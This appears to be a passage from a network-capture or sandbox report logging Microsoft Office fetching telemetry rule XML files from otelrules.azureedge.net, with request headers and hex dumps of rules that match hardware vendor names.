                            2024-11-14 22:38:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            21192.168.2.45514813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:53 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:53 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:53 GMT
                            Content-Type: text/xml
                            Content-Length: 467
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                            ETag: "0x8DC582BA6C038BC"
                            x-ms-request-id: c99285c5-401e-0047-1d71-358597000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223853Z-r178fb8d7656shmjhC1DFWu5kw000000037000000000atty
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:53 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            22192.168.2.45514713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:53 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:53 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:53 GMT
                            Content-Type: text/xml
                            Content-Length: 632
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6E3779E"
                            x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223853Z-16547b76f7fffb7lhC1DFWdsxg00000000m000000000fpmy
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:53 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                            Session IDSource IPSource PortDestination IPDestination Port
                            23192.168.2.45514913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:54 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 407
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                            ETag: "0x8DC582BBAD04B7B"
                            x-ms-request-id: b90175c0-c01e-008e-4b8d-367381000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-r178fb8d7657w5c5hC1DFW5ngg0000000350000000011sz9
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            24192.168.2.45515013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:54 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 486
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                            ETag: "0x8DC582BB344914B"
                            x-ms-request-id: d03fa3d0-501e-0035-53af-36c923000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-1866b5c5fbbsqznnhC1DFWg28g00000000kg00000000kkv5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:54 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            25192.168.2.45515113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:54 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 427
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                            ETag: "0x8DC582BA310DA18"
                            x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-16547b76f7fknvdnhC1DFWxnys0000000md0000000001mew
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:54 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            26192.168.2.45515313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:54 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 407
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                            ETag: "0x8DC582B9698189B"
                            x-ms-request-id: 764b3efa-d01e-007a-4391-36f38c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-r178fb8d765skzg4hC1DFW090c00000001eg000000005kpf
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            27192.168.2.45515213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:54 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 486
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                            ETag: "0x8DC582B9018290B"
                            x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-16547b76f7fmbrhqhC1DFWkds80000000mbg0000000082ua
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:54 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            28192.168.2.45515513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:54 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                            ETag: "0x8DC582BA41997E3"
                            x-ms-request-id: 08770de9-601e-0002-31a7-36a786000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223854Z-16547b76f7f76p6chC1DFWctqw0000000md000000000bfn7
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            29192.168.2.45515613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:54 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 477
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                            ETag: "0x8DC582BB8CEAC16"
                            x-ms-request-id: 9a5983e6-f01e-001f-229b-365dc8000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-164f84587bfjxw6fhC1DFWq94400000000e0000000008nc1
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            30192.168.2.45515413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 469
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                            ETag: "0x8DC582BBA701121"
                            x-ms-request-id: 1d125618-f01e-0085-4c1d-3688ea000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-1749fc9bdbddsfp5hC1DFWz2ng000000010000000000esyt
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            31192.168.2.45515913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:55 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:55 UTC491INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:55 GMT
                            Content-Type: text/xml
                            Content-Length: 494
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB7010D66"
                            x-ms-request-id: bd6b8569-001e-0034-58a8-36dd04000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223855Z-1866b5c5fbb9m92fhC1DFWwu7800000000eg000000008g34
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:38:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            32192.168.2.45515813.107.246.45443
